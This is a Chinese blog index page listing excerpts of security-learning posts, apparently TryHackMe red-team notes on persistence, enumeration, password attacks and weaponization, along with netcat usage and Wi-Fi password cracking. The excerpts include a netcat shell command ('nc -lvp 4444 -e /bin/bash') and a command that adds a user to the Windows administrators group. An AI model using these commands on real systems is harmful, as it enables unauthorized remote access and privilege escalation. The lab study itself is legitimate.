会员
众包
新闻
博问
闪存
赞助商
HarmonyOS
Chat2DB
所有博客
当前博客
我的博客
我的园子
账号设置
会员中心
简洁模式
...
退出登录
注册
登录
Junglezt的博客
博客园
首页
新随笔
联系
订阅
管理
上一页
1
···
5
6
7
8
9
10
11
12
13
···
21
下一页
2023年5月20日
nc和ncat的特殊使用
摘要: 在平常使用nc只会反弹shell,和文件传输,这里学到一些其他的使用方法记录一下 反弹shell # 反弹shell nc -lvp 4444 -e /bin/bash nc -nv target_ip target_port # 常用的反弹shell nc -lvp 4444 nc -nv att
阅读全文
posted @ 2023-05-20 16:04 Junglezt
阅读(427)
评论(0)
推荐(0)
2023年5月17日
Kali Linux使用 airmon-ng 等相关命令爆破 Wifi 密码
摘要: 首先我是在淘宝上买的免驱动的无线网卡,插上一般可以直接使用,不过买回来发现无法连接一些wifi,是wifi除了满格信号,就是没有信号黑色的。 我还以为这个wifi信号怎么这么差,联系客服发现是最新的kali需要安装一个软件包realtek-rtl8188eus-dkms 淘宝客服的教程:kali单频
阅读全文
posted @ 2023-05-17 11:39 Junglezt
阅读(2186)
评论(0)
推荐(0)
2023年5月15日
Linux中对输出结果进行筛选,排序,统计
摘要: 之前在处理Linux标准输出返回结果的时候,有很多凌乱的返回结果,看着很不顺眼,这次学习并总结一些相关的操作 使用grep进行筛选 在查看一些比较大的文件或者执行命令返回结果较长的时候,可以使用grep筛选出需要行的信息,grep命令常用的参数如下: 参数 作用 -i 忽略大小写 -n 显示匹配结果
阅读全文
posted @ 2023-05-15 09:44 Junglezt
阅读(2484)
评论(0)
推荐(0)
2023年4月12日
关于kali使用openvpn连接tryhackme问题
摘要: 直接连接报错 在官网下载连接thm靶机的openvpn配置文件Junglezt.ovpn没有反应 sudo openvpn Junglezt.ovpn 看样子运行成功了,其实报错了,根据提示提示我们使用--data-ciphers,刚开始我也看不懂,其实也是问了群里的大佬解决的 需要修改Jungle
阅读全文
posted @ 2023-04-12 10:16 Junglezt
阅读(167)
评论(1)
推荐(2)
2023年4月7日
THM-红队-Windows本地持久性
摘要: 篡改非特权帐户 分配组成员资格 C:\> net localgroup administrators thmuser0 /add 这将允许您使用 RDP、WinRM 或任何其他可用的远程管理服务来访问服务器。 如果这看起来太可疑,您可以使用Backup Operators组。该组中的用户没有管理权限
阅读全文
posted @ 2023-04-07 18:29 Junglezt
阅读(836)
评论(0)
推荐(1)
2023年4月5日
THM-红队-枚举( Enumeration)
摘要: 介绍 假设我们已经成功地获得了某种形式的系统访问权限。此外,我们可能进行了提权;换句话说,我们可能在目标系统上拥有管理员或 root 权限。即使使用非特权帐户(即,不是 root 或管理员) 我们的目的是收集更多信息,以帮助我们获得对目标网络的更多访问权限。例如,我们可能会找到登录凭据以授予对另一个
阅读全文
posted @ 2023-04-05 19:48 Junglezt
阅读(155)
评论(0)
推荐(0)
2023年4月3日
THM-红队-密码攻击(Password Attacks)
摘要: 密码攻击技术 密码攻击技术 在这个房间里,我们将讨论可用于执行密码攻击的技术。 我们将介绍各种技术,例如字典、蛮力、规则库和猜测攻击。 上述所有技术都被视为主动“在线”攻击,其中攻击者需要与目标机器通信以获取密码,以便获得对机器的未授权访问。 密码破解与密码猜测 本节从网络安全的角度讨论密码破解术语
阅读全文
posted @ 2023-04-03 16:35 Junglezt
阅读(319)
评论(0)
推荐(0)
2023年4月2日
THM-红队-武器化(Weaponization)
摘要: 什么是武器化 武器化是网络杀伤链模型的第二阶段。在此阶段,攻击者使用可交付的有效负载(如 word 文档、PDF 等 [ 1 ])生成和开发自己的恶意代码。武器化阶段旨在使用恶意武器攻击目标机器并获得初始访问权限。 大多数组织都在运行 Windows操作系统,这将成为一个可能的目标。组织的环境策略通
阅读全文
posted @ 2023-04-02 17:46 Junglezt
阅读(753)
评论(0)
推荐(0)
2023年4月1日
THM-被动侦察和主动侦察
摘要: 被动与主动侦察 在计算机系统和网络出现之前,孙子兵法在孙子兵法中教导说:“知己知彼,必胜不疑。” 如果您扮演攻击者的角色,则需要收集有关目标系统的信息。如果你扮演防御者的角色,你需要知道你的对手会发现你的系统和网络的什么 侦察(recon)可以定义为收集有关目标信息的初步调查。这是统一杀伤链在系统上
阅读全文
posted @ 2023-04-01 18:03 Junglezt
阅读(313)
评论(0)
推荐(0)
THM-红队侦查( Red Team Recon)
摘要: “了解你的敌人,了解他的剑。” 宫本武藏在他的著作《五环之书:经典战略指南》中写道。他还写道,“你通过了解敌人的时机,并利用敌人没有预料到的时机来赢得战斗。” 虽然这是在剑和长矛赢得战斗时写的,但它也适用于通过键盘和精心制作的数据包发起攻击的网络空间。您对目标的基础设施和人员了解得越多,就越能更好地
阅读全文
posted @ 2023-04-01 14:10 Junglezt
阅读(166)
评论(0)
推荐(0)
上一页
1
···
5
6
7
8
9
10
11
12
13
···
21
下一页
公告